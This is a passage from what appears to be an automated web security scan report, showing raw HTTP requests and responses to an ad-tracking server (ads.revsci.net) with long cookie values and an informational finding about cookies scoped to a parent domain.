udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3uZd="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElHUq9T0KhTQvGdZl0m4SM6PBI2cYY1w30LyShLbTioctb98V8hvaZFUEgQ5DhRY/E/JCbIHFQwt/grSnyppWDTrJOcjlnvDCzTjIS+HLK7AP9aTgqueQmu680lFkoEEFUMSxfdt5rD64CoLoa0l8uXk0UBMjmWdmqndyZIIYSJuCNnlYKnkyDMP4hkA0MaQmWO9gxSfPCOd+AzOLtzlbElceD/D8Mii+4oPmnpx1l4HmuKIcD5BS/Jw7rMbxTGDRxpWJgCRGEaf1Z1cNn6IGVP91tnkp8xY20+QPxtrt3nomYYv0V3kosvHVhxi0lus/2UGnLZOIF40Kw3Umya0xxySz9SfnlPMRhzaAxGbMACWoZhlo1JTnYe3VtMa8oqVHkhofo0V4U03xF3XB6CLCTPhABPIs91G227uOnv9N6Zfi03hE5l0KKhD2iwnh9ee35ozXo+wsZPgatQNjGXPcbmoEbkbyXglNJNZtZr30qOF4eo8kYhEXAjf4kCs1dejmFZcIloUB7bPWgbcQok2sWx6a6dCtzvq/HqM+CvPXeRvEx4Ayjgi8paZx56l/pdV4usKdvzutXLP5ej7JWbvM7wrzzQezNlsP5pJFr3BzoG9tkiF11WUrw0W0hGMpOAzI2GG+tgK0OE8jzGYJVA0D8p/Gk0s/4xwh+OxzgJzU2U99Ll5s/L0ZVWASL4QHw7oiH5LtrHUYUpUbg/ZandOZo4cg/cvfCZJpDpQewO/yniP7PYQTg4v9oKgcfd99rUWkPWFI68PhGMJSVkXvlyr24N85HgeaDcFWrZeGoS2t0U4WDlZTk6r9dmjClAazs+n9/SxRwEi4jTHwLyScZbszPvaXA2SobfJLQTTuNB86PipDofKUTjXgvqNPExI8NI4NA6QD6oPH9bn0ybOJrf/uDAFM275vtPfrZN80kIHSrFRZxfwQalSUmHL2jOnt1/8HIZ8NC2uLuGjJf/Xw2kEO//MpjA0ZmcsLQQQ5oiGwIiwg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQlg1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzxuinlkSQMJa8r7Hw923Xqgc42Y3a4wLoRcc/Reee1o5DgSioR5Ha0Nr4PHBocSb31KvwZUhYlVLOcHEQDp29fIqnLXvdRPOibpFPrADlIulnIGVnXcnFgp0efTRDENfaJtqIohrGCdPJKyjZdUl274FOZK+AuCPtZ4Or+SzJD1ArXy+EqGRKF0XukBt9J18V8lOtIm9a4adUA9qYpyPOq++JqjhxbOpg4rHoV/RHvOPvu8pghKEvd9081fCQnoscCPjgEI74l3wwsgNRHdzZB7kO2afXdKPzd7EtsFCYWBDUYJ3L6HkQleAoeuCoOuEUqGlEMVzspNKO+NYDbF47K9/oRFc6URqw572BJcOXwAxewBMKTEQdCFr9sKixzWK9gw/r7gdXFJ2WJO7gATmyWilGWysERBhnsybysB9LCAbZUjc6NMJXT36VKTXCduzKpHqWv+og5PYcTcjn2yvjzS84v0pN1EoO+x9fH8I6Oqf8tv3fmqzwd7zMxvzQbgDoO5vA9Qfpu0iZot8wH3PL7YwmU4863UnbzwJSo1QnREn5KuWo/CdmU8ldJZ8zXxtBO7civ97b+xtuApYw7WZiT14Mop1RwvMvd+pw254z5i5C+4PHCdkecis4keyl92Y1SpKqfJ1PzsiVwa24vHGh917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyAeFhZZBD5pnaLfuwzkq+Kl+wCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGesNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbh0tXHxtqBkzuZWP3y0CnqZ2kww2wr+Z+JovuWQ6Z8M1/r9DCXyrPTIVh9T9incB64/hhqfDL0QL0133AcR2XOJyAAA5vFdviFoFhWrT8fR9uOR9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar4aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjrHs7vc5GSpGvo22G6EjA1ba7jaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2cGptYUDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoWULa9Beykv3KI4ZlRj+7F9LQMTvAHxlTjJxHHZQNCGgU0O9s3uo2Kaf+OSSAwoDiaZq5IOttdfa8GnkzYnkGbX3l8xoAyhvsaxeRxx0Co1xB/0MOhTwjS8K9nbKGTmKXH3C4SGjEKIyid3Ig4zjJdrFT6/aOgAMd7uj2Q0dZvCEYhKm5TkjnIcf2fvpNAz1PoM4+2Fv0pTouczfJFHRN2xk8OMgUG/mZoIG+nwI4WrZc1iaeThHUVaCBiYpJDZurF4F1W/gbaAtU4pdxdK1DpFBZoWaQ2UeS7a+a9dmt4tztj1vIzpXbRO499E3A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:02:36 GMT

12.15. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf